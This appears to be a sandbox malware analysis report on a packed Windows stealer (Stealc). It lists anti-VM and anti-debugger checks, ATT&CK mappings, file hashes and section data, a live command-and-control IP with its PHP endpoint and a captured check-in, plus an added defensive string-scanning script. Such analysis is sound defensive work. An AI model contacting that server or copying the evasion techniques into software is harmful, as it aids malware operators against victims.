                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_009A38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0099DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0099E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0099ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009A4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F68A FindFirstFileA,0_2_0099F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0099F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009A3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_009916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0099DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0099BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00991160 GetSystemInfo,ExitProcess,0_2_00991160
                Source: file.exe, file.exe, 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareT
                Source: file.exe, 00000000.00000002.2090478959.00000000015E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPoa
                Source: file.exe, 00000000.00000002.2090478959.0000000001613000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13698
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13643
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13646
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13662
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13658
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009945C0 VirtualProtect ?,00000004,00000100,000000000_2_009945C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009A9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9750 mov eax, dword ptr fs:[00000030h]0_2_009A9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_009A78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard
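The window class names, SoftICE device names and DebugPort/HideFromDebugger calls in this section, together with the VBOX__/VMware/Hyper-V strings in the anti-VM section above, are the stock anti-analysis bundle of the protector whose Oreans.vxd and Software\WinLicense strings also appear in the dump. A quick way to recognise the same bundle in another sample is a string sweep over a memory dump or the unpacked image, in both ASCII and UTF-16LE. The scanner below is an added example, not code from the report or from Joe Sandbox; it assumes the SoftICE names are opened with the usual \\.\ device prefix (the report shows only the bare names NTICE, SICE and SIWVID), the categories are ours, and the SAMPLE buffer is constructed for the demonstration, not a slice of the real dump.

```python
"""Added example: sweep a memory dump or unpacked image for the anti-analysis
strings listed in this report, in both ASCII and UTF-16LE."""
from __future__ import annotations

from dataclasses import dataclass

# Indicator strings come from the signatures above; the categories are ours.
# The SoftICE names carry the \\.\ device prefix they are opened with (the
# report shows only NTICE/SICE/SIWVID), which is an assumption on our part.
INDICATORS = {
    "regmonclass": "analysis-tool window",
    "filemonclass": "analysis-tool window",
    "procmon_window_class": "analysis-tool window",
    "gbdyllo": "analysis-tool window",
    "ollydbg": "analysis-tool window",
    "process monitor - sysinternals: www.sysinternals.com": "analysis-tool window",
    "registry monitor - sysinternals: www.sysinternals.com": "analysis-tool window",
    "file monitor - sysinternals: www.sysinternals.com": "analysis-tool window",
    "\\\\.\\NTICE": "SoftICE device",
    "\\\\.\\SICE": "SoftICE device",
    "\\\\.\\SIWVID": "SoftICE device",
    "HARDWARE\\ACPI\\DSDT\\VBOX__": "VirtualBox ACPI table",
    "VMwareVMware": "VMware hypervisor signature",
    "Hyper-V RAW": "Hyper-V artefact",
    "Oreans.vxd": "Oreans protector (Themida/WinLicense)",
    "Software\\WinLicense": "Oreans protector (Themida/WinLicense)",
}


@dataclass(frozen=True)
class Hit:
    indicator: str
    category: str
    encoding: str   # "ascii" or "utf-16le"
    offset: int


def find_all(hay: bytes, needle: bytes) -> list[int]:
    """Every offset of needle in hay, overlapping matches included."""
    out, i = [], hay.find(needle)
    while i != -1:
        out.append(i)
        i = hay.find(needle, i + 1)
    return out


def scan(data: bytes) -> list[Hit]:
    """Case-insensitive search for each indicator as ASCII and as UTF-16LE.
    bytes.lower() only rewrites A-Z, so applying it to the whole buffer leaves
    the NUL bytes of UTF-16LE text untouched."""
    hay = data.lower()
    hits: list[Hit] = []
    for text, category in INDICATORS.items():
        for label, codec in (("ascii", "ascii"), ("utf-16le", "utf-16-le")):
            needle = text.lower().encode(codec)
            hits.extend(Hit(text, category, label, off) for off in find_all(hay, needle))
    return sorted(hits, key=lambda h: h.offset)


def verdict(hits: list[Hit]) -> dict[str, int]:
    """Hits per category; several categories at once is the protector's full bundle."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h.category] = counts.get(h.category, 0) + 1
    return counts


# Constructed buffer for the demonstration, not a slice of the real dump:
# ASCII and UTF-16LE indicators with padding and an unrelated string between.
SAMPLE = (
    b"\x00" * 16
    + b"PROCMON_WINDOW_CLASS\x00"
    + "\\\\.\\SICE".encode("utf-16-le")
    + b"\x90" * 8
    + b"HARDWARE\\ACPI\\DSDT\\VBOX__\x00"
    + "OllyDbg".encode("utf-16-le")
    + b"harmless text"
)

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"{h.offset:#08x} {h.encoding:8} {h.category:38} {h.indicator}")
    print(verdict(scan(SAMPLE)))
```

Run it against the .sdmp regions this report cites, or a dump taken after the unpacker has finished. On the packed file on disk (entropy 7.95, entry point in .taggant) these strings are not in the clear and the sweep finds nothing, which is itself a hint that the sample needs unpacking first.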

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2956, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_009A9600
                Source: file.exe, file.exe, 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: n?;OProgram Manager
                Source: file.exe, 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: on?;OProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_009A7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_009A7980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_009A7850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_009A7A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.990000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2046702174.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2956, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.990000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2046702174.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 2956, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix. Only the cells with a signature count are listed below; the number in parentheses is how many of this report's signatures map to that technique. The remaining cells of the matrix (Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration and Impact) carried no match for this sample.

                Execution: Command and Scripting Interpreter (2); Native API (11)
                Persistence: DLL Side-Loading (1)
                Privilege Escalation: Process Injection (11); DLL Side-Loading (1)
                Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
                Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
                Collection: Archive Collected Data (1)
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12)
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37 | file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/2 | file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpDH | file.exe, 00000000.00000002.2090478959.00000000015F7000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php=k | file.exe, 00000000.00000002.2090478959.000000000159E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1523733
                      Start date and time:2024-10-02 00:36:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 44s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 88
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Exclude process from analysis (whitelisted): dllhost.exe
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe
                      No simulations
                      Match: 185.215.113.37 (earlier submissions that contacted the same IP)
                      Associated Sample Name / URL | Detection | Threat Name | Context
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      No context
                      Match: WHOLESALECONNECTIONSNL (earlier submissions that contacted the same ASN)
                      Associated Sample Name / URL | Detection | Threat Name | Context
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      file.exe | malicious | Stealc | 185.215.113.37
                      file.exe | malicious | Stealc | 185.215.113.37
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      file.exe | malicious | Stealc | 185.215.113.37
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      file.exe | malicious | Stealc | 185.215.113.37
                      file.exe | malicious | Stealc | 185.215.113.37
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      No context
                      No context
                      No created / dropped files found
                      File type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit): 7.952907434341649
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name: file.exe
                      File size: 1'894'400 bytes
                      MD5: ff898723c4c693eec7140d101d0066d4
                      SHA1: 3127d0d4a74c0d4f3f05a548a39f2fad684c5cb8
                      SHA256: 61959a4f6720629f28f97cb7341d9ac81fb91c91e97ddc28f9840b6eae8bac58
                      SHA512: ad5566e7ab986c3b9edd7fd4d400722933bef18257f16a10978d0778994705f4ee80ba6a0cd9fb938e5fafff81e0fa95d377d95f08e6903a3e8098b4e675f87f
                      SSDEEP: 49152:YJolkijNKQR+xs4HoV8+13jvkd/ZNG5q9TP2KYW:molhNYxdH2zktK54z2KJ
                      TLSH: 1895332A8B998372E17A557EB72C6E30DF171A1ED7E432DB4C01790503D7C887B9A8B4
                      File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                      Icon Hash: 00928e8e8686b000
                      Entrypoint: 0xaba000
                      Entrypoint Section: .taggant
                      Digitally signed: false
                      Imagebase: 0x400000
                      Subsystem: windows gui
                      Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major: 5
                      OS Version Minor: 1
                      File Version Major: 5
                      File Version Minor: 1
                      Subsystem Version Major: 5
                      Subsystem Version Minor: 1
                      Import Hash: 2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      jmp 00007F3A30BA194Ah
                      shufps xmm3, dqword ptr [eax+eax], 00h
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      inc ecx
                      push bx
                      dec esi
                      dec ebp
                      das
                      xor al, 36h
                      dec edi
                      bound ecx, dword ptr [ecx+4Ah]
                      dec edx
                      insd
                      push edi
                      dec eax
                      dec eax
                      jbe 00007F3A30BA19B2h
                      push esi
                      dec edx
                      popad
                      je 00007F3A30BA19ABh
                      push edx
                      dec esi
                      jc 00007F3A30BA19BAh
                      cmp byte ptr [ebx], dh
                      push edx
                      jns 00007F3A30BA1987h
                      or eax, 49674B0Ah
                      cmp byte ptr [edi+43h], dl
                      jnc 00007F3A30BA198Dh
                      bound eax, dword ptr [ecx+30h]
                      pop edx
                      inc edi
                      push esp
                      push 43473163h
                      aaa
                      push edi
                      dec esi
                      xor ebp, dword ptr [ebx+59h]
                      push edi
                      push edx
                      pop eax
                      je 00007F3A30BA1997h
                      xor dl, byte ptr [ebx+2Bh]
                      popad
                      jne 00007F3A30BA198Ch
                      dec eax
                      dec ebp
                      jo 00007F3A30BA1983h
                      xor dword ptr [edi], esi
                      inc esp
                      dec edx
                      dec ebp
                      jns 00007F3A30BA1990h
                      insd
                      jnc 00007F3A30BA19B0h
                      aaa
                      inc esp
                      inc ecx
                      inc ebx
                      xor dl, byte ptr [ecx+4Bh]
                      inc edx
                      inc esp
                      bound esi, dword ptr [ebx]
                      or eax, 63656B0Ah
                      jno 00007F3A30BA1998h
                      push edx
                      insb
                      js 00007F3A30BA19B1h
                      outsb
                      inc ecx
                      jno 00007F3A30BA1992h
                      push ebp
                      inc esi
                      pop edx
                      xor eax, dword ptr [ebx+36h]
                      push eax
                      aaa
                      imul edx, dword ptr [ebx+58h], 4Eh
                      aaa
                      inc ebx
                      jbe 00007F3A30BA198Ch
                      dec ebx
                      js 00007F3A30BA1983h
                      jne 00007F3A30BA1971h
                      push esp
                      inc bp
                      outsb
                      inc edx
                      popad
                      dec ebx
                      insd
                      dec ebp
                      inc edi
                      xor dword ptr [ecx+36h], esp
                      push 0000004Bh
                      sub eax, dword ptr [ebp+33h]
                      jp 00007F3A30BA199Ch
                      dec edx
                      xor bh, byte ptr [edx+56h]
                      bound eax, dword ptr [edi+66h]
                      jbe 00007F3A30BA197Ah
                      dec eax
                      or eax, 506C720Ah
                      aaa
                      xor dword ptr fs:[ebp+62h], ecx
                      arpl word ptr [esi], si
                      inc esp
                      jo 00007F3A30BA19B3h
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      | 0x1000 | 0x25b000 | 0x22800 | 5139d7c1d8979e30cdfcd2bf6fee9fdc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      | 0x25e000 | 0x2b2000 | 0x200 | de8fcd28a84031f6a6bfa6a5e8865082 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      yvmyyuzz | 0x510000 | 0x1a9000 | 0x1a8600 | fee9661bbdb463fd6dc64d04a6b1005d | False | 0.9950593703976436 | data | 7.954108678266825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      loyfpxav | 0x6b9000 | 0x1000 | 0x400 | dd2d15d613dfb86699fd3812790beea4 | False | 0.81640625 | data | 6.224070601811863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant | 0x6ba000 | 0x3000 | 0x2200 | 183fe47a71cf1ec5ffba15d827a984d6 | False | 0.38556985294117646 | DOS executable (COM) | 4.096529025068852 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      DLL | Import
                      kernel32.dll | lstrcpy
                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                      2024-10-02T00:37:03.842008+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Oct 2, 2024 00:37:02.885529995 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Oct 2, 2024 00:37:02.890322924 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Oct 2, 2024 00:37:02.890388966 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Oct 2, 2024 00:37:02.890585899 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Oct 2, 2024 00:37:02.895447969 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Oct 2, 2024 00:37:03.604516983 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Oct 2, 2024 00:37:03.604618073 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Oct 2, 2024 00:37:03.607510090 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Oct 2, 2024 00:37:03.614140987 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Oct 2, 2024 00:37:03.841939926 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Oct 2, 2024 00:37:03.842008114 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Oct 2, 2024 00:37:06.629631996 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      • 185.215.113.37
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 2956 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Oct 2, 2024 00:37:02.890585899 CEST | 89 | OUT | GET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Oct 2, 2024 00:37:03.604516983 CEST | 203 | IN | HTTP/1.1 200 OK
                      Date: Tue, 01 Oct 2024 22:37:03 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
